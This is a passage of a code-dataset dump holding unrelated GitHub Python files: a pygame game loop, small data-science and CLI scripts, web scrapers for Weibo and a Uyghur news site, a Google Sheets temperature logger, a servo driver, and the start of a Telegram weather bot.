1\n if frame_number == 5:\n animated_num += 1\n player_img = pygame.image.load('images/RUN_' + str(animated_num) + '.png')\n if animated_num == 2 or animated_num == 5:\n player_img = pygame.transform.scale(player_img, (8,17))\n else:\n player_img = pygame.transform.scale(player_img, (12,17))\n player_rect = pygame.Rect(player_rect.x, player_rect.y, player_img.get_width(), player_img.get_height())\n frame_number = 0\n if animated_num == 6:\n animated_num = 0\n \n display.fill((146, 244, 255))\n \n tile_Rects = []\n\n true_scroll[0] += (player_rect.x - true_scroll[0] - 150) / 20\n true_scroll[1] += (player_rect.y - true_scroll[1] - 92) / 20\n scroll = true_scroll.copy()\n scroll[0] = int(true_scroll[0])\n scroll[1] = int(true_scroll[1])\n\n pygame.draw.rect(display,(7,80,75),pygame.Rect(0,120,500,80))\n for bg_obj in background_objects:\n obj_rect = pygame.Rect(bg_obj[1][0] - scroll[0] * bg_obj[0], bg_obj[1][1] - scroll[1] * bg_obj[0], bg_obj[1][2], bg_obj[1][3])\n if bg_obj[0] == 0.5:\n pygame.draw.rect(display, (14, 222, 150), obj_rect)\n else:\n pygame.draw.rect(display, (2, 54, 2), obj_rect)\n \n show_health(greenhouse_effect)\n \n y = 0\n for row in game_map:\n x = 0\n for tile in row:\n if tile == 1:\n display.blit(dirt_img, (x * 10 - scroll[0], y * 10 - scroll[1]))\n if tile == 2:\n display.blit(grass_img, (x * 10 - scroll[0], y * 10 - scroll[1]))\n if tile == 10:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 20:\n image = pygame.image.load(\"trash_images/t2.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 30:\n image = pygame.image.load(\"trash_images/t3.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 40 or tile == 50:\n image = pygame.image.load(\"trash_images/t4.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 60:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 1 or tile == 2:\n tile_Rects.append(pygame.Rect(x * 10, y * 10, 10, 10))\n x += 1\n y += 1\n\n for obj in obj_list:\n display.blit(obj[1], (obj[2][0] - scroll[0], obj[2][1] - scroll[1]))\n \n player_movement = [0,0]\n if moving_right == True:\n player_movement[0] += 2\n player_flip = False\n if moving_left == True:\n player_movement[0] -= 2\n player_flip = True\n player_movement[1] += player_gravity\n player_gravity += 0.2\n if player_gravity > 3:\n player_gravity = 3\n \n player_rect, collisions = move(player_rect, player_movement, tile_Rects)\n\n greenhouse_effect = collisions_testing(player_rect, obj_list, greenhouse_effect)\n \n if collisions['bottom'] == True:\n player_gravity = 0\n air_timer = 0\n else:\n air_timer += 1\n \n if moving_left == False and moving_right == False:\n player_img = pygame.image.load('images/idle_player.png')\n player_img = pygame.transform.scale(player_img, (9, 18))\n player_rect = pygame.Rect(player_rect.x, player_rect.y, player_img.get_width(), player_img.get_height())\n display.blit(pygame.transform.flip(player_img, player_flip, False), (player_rect.x - true_scroll[0], player_rect.y - true_scroll[1]))\n else:\n display.blit(pygame.transform.flip(player_img, player_flip, False), (player_rect.x - true_scroll[0], player_rect.y - true_scroll[1]))\n \n \n for event in pygame.event.get(): # event loop\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == timer:\n greenhouse_effect += 4\n if event.type == KEYDOWN:\n if event.key == K_d:\n moving_right = True\n animation_type = \"run\"\n if event.key == K_a:\n moving_left = True\n animation_type = \"run\"\n if event.key == K_w or event.key == K_SPACE:\n if air_timer < 6:\n player_gravity = -5\n if event.type == KEYUP:\n if event.key == K_d:\n moving_right = False\n if event.key == K_a:\n moving_left = False\n \n screen.blit(pygame.transform.scale(display, WINDOW_SIZE), (0, 0))\n \n pygame.display.update()\n \n clock.tick(60)\n","repo_name":"ShivankC/Climate-Warrior","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":18103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41953350728","text":"from parameters import *\r\nfrom sklearn.model_selection import train_test_split\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = []\r\nnb_pts = 200\r\nvarx=0.25\r\nvary=0.25\r\n\r\n\r\ndef divide_images_and_labels(images, labels):\r\n\r\n X_train, X_val, Y_train, Y_val = train_test_split(images, labels, test_size=0.2) #images :all_images labels: all_label_numbers\r\n X_val, X_test, Y_val, Y_test = train_test_split(X_val, Y_val, test_size=0.5)\r\n\r\n return X_train, Y_train, X_val, Y_val, X_test, Y_test\r\n\r\n\r\ndef create_dataset():\r\n\r\n\r\n cov = [[varx, 0,0],[0, vary,0],[0,0,0]]\r\n\r\n mean = [[0,7,0],[5,5.5,1],[2.5,6,2],[1.3,7.5,3],[2.7,7.2,4],[0.8,5.75,5],[4,6.5,6],[2,5,7],[4.2,7.6,8],[3.5,5.1,9]]\r\n\r\n for i in range(len(mean)):\r\n # dataset['data'+str(i)] = np.random.multivariate_normal(mean[i], cov, N)\r\n data.append(np.random.multivariate_normal(mean[i], cov, nb_pts))\r\n\r\n dataWithLabel=np.random.permutation(np.concatenate(data))\r\n\r\n #D : données\r\n all_points = dataWithLabel[:,[0,1]]\r\n\r\n\r\n\r\n #Z : Labels des données\r\n all_label_numbers = dataWithLabel[:,2]\r\n\r\n\r\n\r\n return dataWithLabel, all_points, all_label_numbers\r\n\r\n\r\n\r\ndef plot_dataset(all_images,dataWithLabel):\r\n list_colors = ['red', 'green', 'blue', 'orange', 'black', 'purple', 'yellow', '#bd2309', 'cyan', 'm']\r\n for i in range(len(dataWithLabel)):\r\n for index in range(len(list_colors)):\r\n if dataWithLabel[i,2]==index :\r\n plt.scatter(all_images[i, 0], all_images[i, 1], c=list_colors[index], marker='x')\r\n\r\n plt.xlabel('x')\r\n plt.ylabel('y')\r\n plt.title('samples')\r\n plt.show()\r\n\r\n\r\n","repo_name":"baptistepouthier/plancton","sub_path":"SVM/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7824677729","text":"from app.utils import is_valid_name\n\n\nclass HumanPlayer:\n\n def __init__(self, mark: str) -> None:\n self.mark = mark\n\n def set_player_info(self, meta_str: str) -> None:\n \"\"\"\n Ask the name of the player and set it\n Args:\n meta_str: Player's turn Either First player or Second player\n \"\"\"\n while True:\n name = input(f'Enter a {meta_str} Name - {self.mark}: ')\n try:\n if is_valid_name(name):\n self.name = name\n return True\n else:\n print(\"Invalid Name\")\n except KeyboardInterrupt:\n print(\"Keyboard Interrupted\")\n\n def get_choice(self, game_object: object) -> int:\n \"\"\"\n Get player's choice\n Args:\n game_object: Context of the game to use for the\n Returns:\n position: Player's choice for the move\n \"\"\"\n while True:\n position = input(f\"{self.name}'s turn ==> Enter your choice: \")\n try:\n position = int(position.strip())\n if not game_object.is_valid_cell_no(position):\n print(\"Position is Invalid\")\n continue\n if not game_object.is_cell_available(position):\n print(\"Cell is already occupied\")\n continue\n return position\n except BaseException:\n print(\"Given input is invalid\")\n","repo_name":"aadityanj/tic_tac_toe","sub_path":"app/players/human_player.py","file_name":"human_player.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41101260853","text":"import lidaExcel\nimport statistical\nimport copy\nfrom knn_final import knn_impute\nfrom KMeans import KMeansInterface\nfrom DBScan import DBScanInterface\nfrom hierarchical import HierarchicalInterface\n\n##############################################################################\nprint(\"Hello. This is a simple control for users\\n\")\nprint(\"We have some training datasets for your tests, they are: \\n1 - Wine\\n2 - Balance\\n3 - Iris\\n4 - Glass\\n5 - Breast Cancer Winsconsin\\n\")\nname = int(input(\"Select your training dataset :\"))\n\nif(name == 1):\n path = 'Datasets/wine.xlsx'\n name = 'wine'\nelif(name == 2):\n path = 'Datasets/balance.xlsx'\n name = 'balance'\nelif(name == 3):\n path = 'Datasets/iris.xlsx'\n name = 'iris'\nelif(name == 4):\n path = 'Datasets/glass.xlsx'\n name = 'glass'\nelif(name == 5):\n path = 'Datasets/cancer.xlsx'\n name = 'cancer'\n \n\nds = lidaExcel.leMatriz(path, name)\nprint(\"You choose: %s\\n\" % name)\n\nrate = float(input(\"Now, choose the rate of MV in the training dataset: \"))\nmv = lidaExcel.geraMissingValues(ds,rate)\nlidaExcel.gravaNovaAba(mv,path,\"MV\")\nprint(\"Sheet stored in %s.xlsx\\n\" %name)\nprint(\"####################################################################\\n\")\nprint(\"We have 5 imputations methods:\\n1 - Mean\\n2 - Mode\\n3 - Median\\n4 - Deviation\\n5 - KNN\\n\")\n\nsheetCount = 5\n\n\nmv1 = copy.deepcopy(mv)\nmatrix = statistical.imputationMean(mv1)\nlidaExcel.gravaNovaAba(matrix,path,\"Mean\")\n\nmatrix = statistical.imputationMode(mv)\nlidaExcel.gravaNovaAba(matrix,path,\"Mode\")\n\nmv2 = copy.deepcopy(mv)\nmatrix = statistical.imputationMode(mv2)\nlidaExcel.gravaNovaAba(matrix,path,\"Median\")\n\nmatrix = statistical.imputationDesvioPadrao(mv)\nlidaExcel.gravaNovaAba(matrix, path, \"Deviation\")\n\nmatrix = [knn_impute(reg,mv,3,\"mean\") for reg in mv] \nlidaExcel.gravaNovaAba(matrix,path,\"KNN\")\n \nprint(\"You imputed the rate of %d\" %rate)\n\n#We'll now apply clustering methods on each sheet of dataset\nprint(\"We have 3 clustering methods:\\n1 - KMeans\\n2 - DBScan\\n3 - Hierarchical\\n\")\nclustering = int(input(\"Enter with a number of clustering method (press 0 to exit loop): \"))\nprint(\"We'll apply the clustering method on all sheets of dataset\")\n\nwhile(clustering!=0):\n if clustering == 1:\n for i in range(2, sheetCount+1):\n print(\"For the sheet %d\\n\", i)\n KMeansInterface(path, i)\n elif clustering == 2:\n for i in range(1, sheetCount):\n DBScanInterface(path, i)\n elif clustering == 3:\n for i in range(1, sheetCount):\n HierarchicalInterface(path, i)\n clustering = int(input(\"Choose again or press 0 to exit loop: \"))\n","repo_name":"jefnvo/IC-MissingValues","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26734804851","text":"#######################################################################\n## CS 101 Lab\n## Program 8\n## Name: Osay Edo Ohonba\n## Email: ooenw7@umsystem.edu\n##\n## PROBLEM : Create write a program to allow the user to enter 2 types of grades and calculate them.\n## ALGORITHM :\n## import math and time\n## Define functions\n## logic\n## End display\n## ERROR HANDLING:\n## N/A\n## OTHER COMMENTS:\n## Any special comments\n##\n########################################################################\nimport math\nimport time\nassignment_scores = []\ntest_scores = []\n\ndef grade_menu():\n print(' Grade Menu\\n1 - Add Test\\n2 - Remove Test\\n3 - Clear Tests\\n4 - Add Assignment\\n5 - Remove Assignments\\n6 - Clear Assignments\\nD - Display Scores\\nQ - Quit')\ndef add_test():\n test = int(input('Enter the new Test score 0-100 ==> '))\n if test < 0 or test > 100:\n return\n else:\n test_scores.append(test)\ndef remove_test():\n assignment_scores.remove[-1]\ndef clear_tests():\n test_scores.clear()\ndef add_assignment():\n assig = int(input('Enter the new Test score 0-100 ==> '))\n if assig < 0 or assig > 100:\n return\n else:\n assignment_scores.append(assig)\ndef remove_assignment():\n assignment_scores.remove[-1]\ndef clear_assignment():\n assignment_scores.clear()\ndef display_scores():\n print(test_scores, assignment_scores)\n\nif __name__ == '__main__':\n u_input = ''\n while u_input != 'Q' or u_input != 'q':\n grade_menu()\n u_input = input('\\n==> ')\n if u_input == '1': add_test()\n if u_input == '2': remove_test()\n if u_input == '3': clear_tests()\n if u_input == '4': add_assignment()\n if u_input == '5': remove_assignment()\n if u_input == '6': clear_assignment()\n if u_input == 'D' or u_input == 'd': display_scores()\n if u_input == 'Q' or u_input == 'q': print('Thank you for using this service. THE END')\n \n\n\n\n\n\n\n\n\n\n\n","repo_name":"oedo3/101L_005L","sub_path":"assig_8/code/code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19548337872","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\"\"\"\n@version: python3.7\n@author: nero\n@contact: 627482453@qq.com\n@software: PyCharm\n@file: DailySpider.py\n@time: 2020/03/08\n@description: daily logs of weiboSpider\n\"\"\"\nfrom abc import ABC\n\nimport scrapy\n\nfrom weibo import SpiderUtils\nfrom weibo.items import DailyIndexItem, DailyCommentItem\n\n\nclass DailySpider(scrapy.Spider, ABC):\n # start the spider by the name.\n name = SpiderUtils.get_spider_name1()\n\n def __init__(self, idlist=\"0\", **kwargs):\n super().__init__(**kwargs)\n self.list_id = idlist\n\n def start_requests(self):\n \"\"\"\n Before starting to crawl.\n\n step:\n 1. init DailyItem\n 2. get the url\n 3. scrapy.Request\n\n yield scrapy.Request() to self.parse_index\n\n \"\"\"\n\n # get index url\n url = SpiderUtils.get_index_url(self.list_id)\n # yield scrapy.Request\n # to self.parse_index\n # item -> DailyItem\n yield scrapy.Request(url=url, callback=self.parse_index)\n\n def parse_index(self, response):\n \"\"\"\n\n Parse the index page.\n step:\n 1. get the item.\n 2. save the index page.\n 3. get the comment-mid to splice the comment-url.\n 4. request the comment-page.\n\n @param response:\n \"\"\"\n item = DailyIndexItem()\n item['index'] = response.text\n\n # get dir_comments from index\n # [\"length\": int, \"mids\": str, \"comment_urls\": str]\n dir_comments = SpiderUtils.get_daily_comment_url(response.text)\n\n yield item\n\n for i in range(dir_comments[\"length\"]):\n yield scrapy.Request(url=dir_comments[\"comment_urls\"][i], callback=self.parse_comment,\n meta={'mid': dir_comments[\"index_mids\"][i]})\n\n def parse_comment(self, response):\n \"\"\"\n Parse the comment page.\n\n step:\n 1. save the comment.\n 2. yield the item.\n\n @param response:\n @return:\n \"\"\"\n\n item = DailyCommentItem()\n # get the mid\n mid = response.meta['mid']\n\n item['comment']= mid + \"|\" + response.text\n\n yield item\n","repo_name":"yu627482453/PublicOpinionSystemV1","sub_path":"project/Spider/weiboSpider/weibo/spiders/DailySpider.py","file_name":"DailySpider.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"38782593929","text":"from datetime import datetime\nfrom time import sleep\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom temp_logger import temp_row_maker \n\n# scope = ['https://spreadsheets.google.com/feeds']\n# credentials = ServiceAccountCredentials.from_json_keyfile_name('/home/pi/temp_logger/palace temp logger-88911bdd605e.json', scope)\n# gc = gspread.authorize(credentials)\n# sh = gc.open(\"palace kitchen temp log\")\n\n#wks = gc.open(\"palace kitchen temp log\").sheet1\n#wks.update_acell('A1', 'test')\n\n\n#print(wks)\n\ndef sheets_logger():\n scope = ['https://spreadsheets.google.com/feeds']\n credentials = ServiceAccountCredentials.from_json_keyfile_name('/home/pi/temp_logger/palace temp logger-88911bdd605e.json', scope)\n gc = gspread.authorize(credentials)\n sh = gc.open(\"palace kitchen temp log\")\n try:\n worksheet = sh.worksheet(datetime.now().strftime('%m.%d.%Y'))\n worksheet.append_row(temp_row_maker())\n except gspread.exceptions.WorksheetNotFound:\n worksheet = sh.add_worksheet(datetime.now().strftime('%m.%d.%Y'),\n rows='1',\n cols='7')\n worksheet.append_row(['time',\n 'sensor 1',\n 'sensor 2',\n 'sensor 3',\n 'sensor 4',\n 'sensor 5',\n 'sensor 6'])\n worksheet.append_row(temp_row_maker())\n except Exception as e:\n with open('error_log.txt','a+') as er_log:\n er_log.write('ERROR: {} at {:.2f}\\u00b0F \\n'.format(str(e), datetime.now().strftime('%m/%d/%Y, %I:%M %p')))\n\n\nwhile True:\n sheets_logger()\n sleep(60)\n","repo_name":"gabrielx52/temp_logger","sub_path":"sheets_log.py","file_name":"sheets_log.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33031594418","text":"import re\nimport json\nfrom urllib import request\nfrom pyquery import PyQuery as pq\nfrom parallel_corpus_utils import parallel_corpus_info\n\n\n\nheaders = {\n \"Host\": \"uyghur.people.com.cn\",\n \"Cookie\": \"wdcid=62baa762b4832f8a; wdlast=1545032438; wdses=4169b7d11f9e8cf1\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\",\n \"Referer\": \"http://uyghur.people.com.cn/\"\n }\n\nsuffix_dict = {}\n# used for new indexes\nsuffix_dict_temp = {}\npattern1 = re.compile(r\"/\\d+/\\d+.html\")\npattern2 = re.compile(r\"/\\S+\\d/index.html\")\npattern3 = re.compile(r\"\\S+\\d\\S*\")\n\n#get \"/******/index.html\"\ndef get_url_suffixes():\n url_suffixes = []\n url = \"http://uyghur.people.com.cn/\"\n try:\n req = request.Request(url, headers=headers)\n page = request.urlopen(req).read()\n doc = pq(page)\n tag_li_s = doc(\"ul li\")\n for i in range(len(tag_li_s)):\n for j in range(len(tag_li_s.eq(i).children())):\n suffix = tag_li_s.eq(i).children().eq(j).attr(\"href\")\n temp = check_suffixes(suffix)\n if temp and temp not in url_suffixes:\n url_suffixes.append(temp)\n url_suffixes.append(\"/311301/311302/index.html\")\n print(url_suffixes)\n for suff in url_suffixes:\n suffix_dict[suff] = []\n return url_suffixes\n\n except Exception as e:\n print(e)\n\n\n#input \"/******.index\", get \"/******/******.html\"\ndef get_news_url(url_suffix):\n url = \"http://uyghur.people.com.cn\" + url_suffix\n other_suffix = []\n complete_suffixes = []\n try:\n req = request.Request(url, headers=headers)\n page = request.urlopen(req).read()\n doc = pq(page)\n tag_li_s = doc(\"ul li\")\n for i in range(len(tag_li_s)):\n for j in range(len(tag_li_s.eq(i).children())):\n t = tag_li_s.eq(i).children().eq(j).attr(\"href\")\n if t is None:\n continue\n if re.match(pattern2, t) and t not in suffix_dict.keys():\n suffix_dict_temp[t] = []\n if re.match(pattern1, t):\n l = '/' + t.split(\"/\")[1] + '/index.html'\n if l not in suffix_dict.keys():\n suffix_dict_temp[l] = [t]\n else:\n if t not in suffix_dict[l]:\n suffix_dict[l].append(t)\n\n return complete_suffixes\n\n except Exception as e:\n print(e)\n\n\n#check\ndef check_suffixes(suffix):\n if not suffix:\n print(\"Before: \" + \"None\")\n else:\n print(\"Before: \" + suffix)\n if not suffix or len(suffix) > 30 or not re.match(pattern3, suffix):\n print(\"After: \" + \"None\")\n return None\n if re.match(pattern2, suffix):\n print(\"After: \" + suffix)\n return suffix\n if re.match(pattern1, suffix):\n l = '/' + suffix.split(\"/\")[1] + '/index.html'\n print(\"After: \" + l)\n return l\n\n#use url to get the news.\ndef get_news_contents(url):\n try:\n url = \"http://uyghur.people.com.cn/155989/15747053.html\"\n req = request.Request(url, headers=headers)\n page = request.urlopen(req).read()\n doc = pq(page)\n title = doc(\"#p_title\").text()\n contents = doc(\"#zoom\").text()\n\n\n except Exception as e:\n print(e)\n\n\n#slice up the sentences to right length\ndef slice_contents(contents, punctuations):\n assert isinstance(contents, str)\n assert isinstance(punctuations, list)\n sentences_list = contents.split(\".\")\n print(len(sentences_list))\n for s in sentences_list:\n if len(s.split(\" \")) > 40:\n for i in range(4):\n # if s.find(\"i\") in\n continue\n\n\ndef main():\n MAX_LEN, MIN_LEN, punctuations = parallel_corpus_info(\"./uy.txt\")\n # get_url_suffixes()\n # for k in suffix_dict.keys():\n # get_news_url(k)\n # print(suffix_dict)\n # with open(\"uy_url_suffixes.json\", \"w\") as f:\n # f.write(json.dumps(suffix_dict))\n\n with open(\"./uy_url_suffixes.json\", \"r\") as f:\n suffixes = json.loads(f.readline())\n assert isinstance(suffixes, dict)\n # for key, suffix_list in suffixes.items():\n # for suffix in suffix_list:\n # continue\n get_news_contents(\"\")\n\n\n\n\n\n # f = open(\"./test.txt\", \"w\")\n # f.write(contents)\n # f.close()\n\n\n #\n # urls = doc('li')\n #\n # print(type(urls.children().eq(0).text()))\n #\n # s = urls.children().eq(0)\n # print(s)\n # u = s.encode(\"utf-8\").decode(\"gb2312\")\n # print(u)\n # d = s.encode(\"utf-8\").decode(\"unicode-escape\")\n # print(d)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ivan-Young/UygCorpus","sub_path":"get_uyg_monolingual_corpus.py","file_name":"get_uyg_monolingual_corpus.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27923607217","text":"from calvinextras.calvinsys.io.servomotor import BaseServo\nimport Adafruit_PCA9685\n\n\nclass Adafruit_pca9685(BaseServo.BaseServo):\n \"\"\"\n Calvinsys object handling servo using ADAFRUIT PCA9685\n \"\"\"\n def init(self, angle, frequency, minimum_pulse, maximum_pulse, *args, **kwargs):\n self._i2c_addr = kwargs.get(\"i2c_addr\", 0x40)\n self._pin_base = kwargs.get(\"pin_base\", 0x0)\n self._bus_num = kwargs.get(\"bus_num\", 1)\n \n self._angle = angle\n \n self._minimum_pulse = minimum_pulse\n self._maximum_pulse = maximum_pulse\n \n self._pwm = Adafruit_PCA9685.PCA9685(address=self._i2c_addr, busnum=self._bus_num)\n self._frequency = frequency\n self._pwm.set_pwm_freq(self._frequency)\n\n scaling = (1.0 / self._frequency / 4096 * 10**6)\n \n self._servo_min = int(round(self._minimum_pulse / scaling))\n self._servo_max = int(round(self._maximum_pulse / scaling))\n \n def can_write(self):\n return self._pwm is not None\n \n def write(self, angle_or_pulse):\n if self._angle:\n return self._set_angle(angle_or_pulse)\n else :\n return self._set_pulse(angle_or_pulse)\n\n def _set_angle(self, angle):\n if angle < 0 :\n angle = 0\n elif angle > 180:\n angle = 180\n\n self._set_pwm(int(round(((self._servo_max - self._servo_min) / 180.) * angle)))\n\n def _set_pwm(self, pulse):\n # Force with in range\n pulse = min(self._servo_max, max(self._servo_min, pulse))\n self._pwm.set_pwm(self._pin_base, 0, pulse)\n \n def close(self):\n self._pwm = None","repo_name":"EricssonResearch/calvin-base","sub_path":"calvinextras/calvinsys/io/servomotor/raspberry_pi/Adafruit_pca9685.py","file_name":"Adafruit_pca9685.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"18"} +{"seq_id":"19337587134","text":"'''\n문제에서 요구하는 형식에 맞게 짜보자\n'''\nimport sys\ninput=sys.stdin.readline\n\nimport heapq\nfrom collections import deque\nN=int(input())\nList=[]\nheapq.heapify(List)\nGraph=['' for _ in range(N+1)]\nOperator=[{'parent':0,'lchild':0,'rchild':0,'val':0} for _ in range(2*N)]\nSUM=0\n#일단 트리를 만든다.\nfor j in range(1,2*N):\n temp=list(input().split())\n if len(temp)==1: \n x=int(temp[0])\n Operator[j]['val']=x\n heapq.heappush(List,x)\n SUM+=x\n else: \n x,y,z=temp[0], int(temp[1]),int(temp[2])\n Operator[j]['lchild']=y; Operator[y]['parent']=j\n Operator[j]['rchild']=z; Operator[z]['parent']=j\n Operator[j]['val']=x\n if j==2*N-1: Operator[j]['parent']=j\nroot=Operator[2*N-1]['parent']\n\nwhile root!=Operator[root]['parent']:\n root=Operator[root]['parent']\n\n\nq=deque([])\n# if Operator[root]['val']=='+':\n# q.append([root,0]) #root가 +일 경우\n# else:\n# q.append([root,1]) #root가 -일 경우\n\n\nq.append([root,0]) #처음 root는 +로 초기화\nminus=0\nwhile q:\n node,operator=q.popleft()\n if 0< node and node<=N: #숫자라면\n if operator: \n minus+=1\n #print('해당노드',node)\n continue\n q.append([Operator[node]['lchild'], operator])\n if Operator[node]['val']=='+':\n q.append([Operator[node]['rchild'],operator])\n if Operator[node]['val']=='-': #뒤집어요\n q.append([Operator[node]['rchild'],operator^1])\n\n# print(minus)\n\nfor i in range(minus):\n x=heapq.heappop(List)\n SUM-=2*x\n\nprint(SUM)\n#일단 트리를 만든다.\n\n","repo_name":"Youngseo-Jeon0313/baekjoon","sub_path":"백준17501.py","file_name":"백준17501.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"2926736486","text":"import tweepy\n\n\ndef login(name):\n lines = []\n with open(name) as f:\n lines = f.readlines()\n\n apiKey = lines[0].strip(\"\\n\")\n apiSecret = lines[1].strip(\"\\n\")\n accessToken = lines[2].strip(\"\\n\")\n accessTokenSecret = lines[3].strip(\"\\n\")\n \n \"\"\"Create the authentication\"\"\"\n\n authenticate = tweepy.OAuthHandler(apiKey, apiSecret)\n\n \"\"\"Set the access token and the access token secret\"\"\"\n\n authenticate.set_access_token(accessToken, accessTokenSecret)\n\n \"\"\"Create the API Object\"\"\"\n api = tweepy.API(authenticate)\n \n return api\n\n\n\n\n","repo_name":"Pierciest/financial-analysis-for-crypto-currencies","sub_path":"modules/loginCred.py","file_name":"loginCred.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"21085473811","text":"import tensorflow as tf\nfrom keras_helper import KeyboardPosition, RemoveTailNoise, word_accuracy, get_lr_metric\nfrom tensorflow.keras.layers import Input, Dense, Concatenate, Dropout\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.models import Model\n\ndef get_our_model(learning_rate = 0.001,dropout_rate = 0.2):\n input_node = Input(shape=(21,3))\n shift_controller = input_node[:,:,:1]\n x = Dense(256,activation='relu')(input_node)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Concatenate()([x,input_node])\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(2)(x)\n concat = Concatenate(axis=2)([shift_controller,x])\n keyboard_position = KeyboardPosition()(concat)\n cleand_keyboard_positioin = RemoveTailNoise()([keyboard_position,input_node])\n model_train = Model(inputs=input_node, outputs=concat)\n model_inference = Model(inputs=input_node, outputs=cleand_keyboard_positioin)\n optimizer = Adam(learning_rate=learning_rate)\n model_train.compile(loss='mean_squared_error', optimizer=optimizer)\n model_inference.compile(loss='mean_squared_error', metrics=[word_accuracy])\n return model_train, model_inference","repo_name":"pureexe/lexpimmon-train","sub_path":"model_our.py","file_name":"model_our.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16189232731","text":"\"\"\"Apps that need to be registered for the scheduler.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.apps import AppConfig\n\nlogger = logging.getLogger('flash_stache')\n\n\nclass SchedulerConfig(AppConfig):\n \"\"\"FlashArray Monitoring Scheduler configuration.\"\"\"\n name = 'scheduler'\n verbose_name = 'FlashArray Monitoring Scheduler'\n\n def ready(self):\n \"\"\"Get the FlashArray model and look for enabled jobs that need to be scheduled.\"\"\"\n try:\n self.reschedule_repeatable_jobs()\n except Exception as error:\n logger.error('Failed to connect to the scheduler.\\n{}'.format(error))\n\n def reschedule_repeatable_jobs(self):\n \"\"\"Ensure that repeating jobs are scheduled.\"\"\"\n flash_array = self.get_model('FlashArray')\n # Only schedule enabled arrays\n jobs = flash_array.objects.filter(enabled=True)\n _reschedule_jobs(jobs)\n logger.info('Scheduled/Re-scheduled jobs: {}'.format(jobs))\n\n\ndef _reschedule_jobs(jobs):\n \"\"\"Reschedule one or more jobs.\"\"\"\n for job in jobs:\n if not job.is_scheduled():\n logger.info('Job {} was not scheduled. Scheduling it now.'.format(job.id))\n job.save()\n","repo_name":"PureStorage-OpenConnect/FlashStache","sub_path":"flasharray/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"12950069156","text":"import logging\r\nfrom telegram.ext import Updater\r\nfrom telegram.ext import CommandHandler #copy\\ start\r\nfrom telegram.ext import MessageHandler\r\nfrom telegram.ext import Filters\r\nimport requests\r\nimport json\r\nimport random\r\n\r\n\r\n\r\nclass WeatherApi:\r\n def __init__(self, token):\r\n self.token = token\r\n \r\n def data_for(self, *args):\r\n query = ','.join(args)\r\n url = f\"http://api.openweathermap.org/data/2.5/weather?q={query}&appid={self.token}&units=metric\"\r\n data = requests.get(url)\r\n return data.json()\r\n \r\n\r\nclass Bot:\r\n def __init__(self, token):\r\n self.enable_logging()\r\n self.updater = Updater(token=token, use_context = True)\r\n self.dispatcher = self.updater.dispatcher\r\n self.weather_api = WeatherApi('#############################')\r\n self.add_handlers() #обработчик создаваемых событий\r\n \r\n def enable_logging(self):\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n \r\n def add_handlers(self):\r\n start = CommandHandler('start', self.start) #start\r\n self.dispatcher.add_handler(start)\r\n \r\n message = MessageHandler(Filters.text & (~Filters.command), 